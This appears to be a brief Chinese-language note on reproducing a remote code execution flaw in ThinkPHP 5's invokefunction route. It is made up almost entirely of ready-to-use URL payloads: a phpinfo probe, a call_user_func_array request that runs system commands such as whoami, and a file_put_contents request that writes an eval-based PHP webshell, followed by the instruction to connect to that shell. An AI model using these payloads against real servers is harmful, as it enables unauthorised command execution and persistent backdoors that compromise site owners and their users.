漏洞复现(5-rce)
poc:
/index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=100
payload11111:
代码执行
格式:
index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=系统命令
&vars[1][]=命令
index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
payload2222:
写入webshell
/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=加你要写入的文件内容url编码
最后添加的payload
/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=%3C%3Fphp%20%40eval%28%24_POST%5B2233%5D%29%3B%3F%3E
最后去连接webshell
参考文章:
https://blog.csdn.net/qq_29647709/article/details/84956221
https://blog.csdn.net/qq_38807738/article/details/86777608